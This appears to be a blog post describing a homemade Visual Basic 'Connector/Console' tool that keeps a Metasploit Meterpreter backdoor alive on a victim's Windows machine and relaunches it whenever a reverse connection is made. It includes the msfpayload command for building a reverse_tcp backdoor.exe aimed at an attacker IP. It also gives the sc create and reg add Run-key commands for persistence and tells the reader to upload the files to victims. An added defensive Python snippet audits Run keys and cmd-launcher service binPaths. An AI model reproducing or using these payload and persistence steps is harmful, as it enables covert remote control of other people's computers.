A while back I needed a way to make Metasploit's Meterpreter persistent, or at least to be able to execute it remotely whenever needed.
I decided to try to create a tool for that using Visual Basic.
Let me first say that I am not a programmer; I have very basic programming skills (some code snippets were taken from Planet Source Code).
The concept is very simple. The program has two parts:
1. Server (Console) – The server acts as a listener. It only receives connections from the client and has no other features.
2. Client (Connector) – Tries to connect to the server (a reverse connection) at a pre-configured interval. Once a connection is established it automatically executes the Meterpreter exe file (or any other file you'd like).
Let’s assume you have already created a meterpreter binary payload and you have already deployed it on your target victim machine.
If not, here’s the syntax for creating a basic meterpreter binary payload:
exploit ~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 X > backdoor.exe
Usage is simple. The first time you launch the client (Connector) it runs in "config" mode, which means it is visible.
Run it first on your own PC and configure the settings as desired:
Remote Host IP: "Attacker/Listener IP address"
Remote Host Port: "Attacker/Listener port"
Visibility: "true or false"
Meterpreter Path: "Meterpreter path on the client/victim PC"
Connection Interval: "1000 – 60000"
After saving the changes an ini file will be created.
If you choose to run the client (Connector) in invisible mode, the only way to make it visible again is to first kill its process via the Task Manager and then edit the visible value in the ini file.
You should upload the following files to the victim machine:
connector.exe & connector.ini – upload to any folder you like (both files should be in the same folder)
MSWINSCK.OCX – upload to the windows/system32 folder if it doesn't already exist
If you have administrative/SYSTEM privileges on the victim machine you can run connector.exe as a system service with the following commands (Win XP):
sc create connector binPath= "cmd /K start c:\windows\system32\connector.exe" start= auto error= ignore
net start connector
If you only have user privileges you can run it at startup instead:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v connector /t REG_SZ /d "c:\windows\system32\connector.exe"
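From the defender's side, both persistence methods above leave artifacts that a simple baseline audit catches: a new Run value, and a service whose binPath is a cmd.exe launcher rather than the real image. The following added example (not part of the tool or the original post) checks constructed sample data shaped like the output of reg query and sc qc; the baseline and snapshot values are assumed, not taken from a real host.

```python
import re

# Constructed sample data: a known-good baseline of Run values and a later
# snapshot of Run values and service binPaths (assumed, not from a real host).
BASELINE_RUN = {"SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe"}
SNAPSHOT_RUN = {
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "connector": r"c:\windows\system32\connector.exe",
}
SNAPSHOT_SERVICES = {
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "connector": r"cmd /K start c:\windows\system32\connector.exe",
}

# Matches a binPath that starts its real payload through "cmd /K" or "cmd /c",
# so the image the Service Control Manager records is not the executable run.
LAUNCHER_RE = re.compile(r'\bcmd(?:\.exe)?"?\s+/[kc]\b', re.IGNORECASE)


def audit_run_keys(baseline, snapshot):
    """Return findings for Run values missing from the baseline or changed."""
    findings = []
    for name, cmd in snapshot.items():
        if name not in baseline:
            findings.append(f"Run value '{name}' not in baseline: {cmd}")
        elif baseline[name].lower() != cmd.lower():
            findings.append(f"Run value '{name}' changed: {baseline[name]} -> {cmd}")
    return findings


def audit_services(services):
    """Return findings for services whose binPath is a cmd.exe launcher chain."""
    findings = []
    for name, binpath in services.items():
        if LAUNCHER_RE.search(binpath):
            findings.append(f"Service '{name}' starts through cmd: {binpath}")
    return findings


if __name__ == "__main__":
    for line in audit_run_keys(BASELINE_RUN, SNAPSHOT_RUN) + audit_services(SNAPSHOT_SERVICES):
        print(line)
```

On a live host the same two functions can be fed the parsed output of reg query HKLM\...\Run and sc qc for each service, with the baseline captured from a clean build.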
Once the client (Connector) is running on the victim machine you can start the server on your side.
After a connection is established from the Connector to the Console, the exe file you specified will be executed on the victim machine.
This video shows the use of the Connector and Console. The same machine is used as both the attacker and the victim system, for convenience only.
Here we can see how the Windows calculator executes when a connection is established.
The second video is the same as the first but uses Meterpreter; again the same Windows machine is used as attacker/victim, with the exception of an additional SSH session to a BackTrack machine.
This is just to show how the tool works and is not a real-world setup.
Later on I added some more features and expanded the program's capabilities; I call this version "N@TSh3ll".
Added: multiple sockets to accept more connections, a cmd shell, and DynDNS support.
Here are some screenshots of the extended version: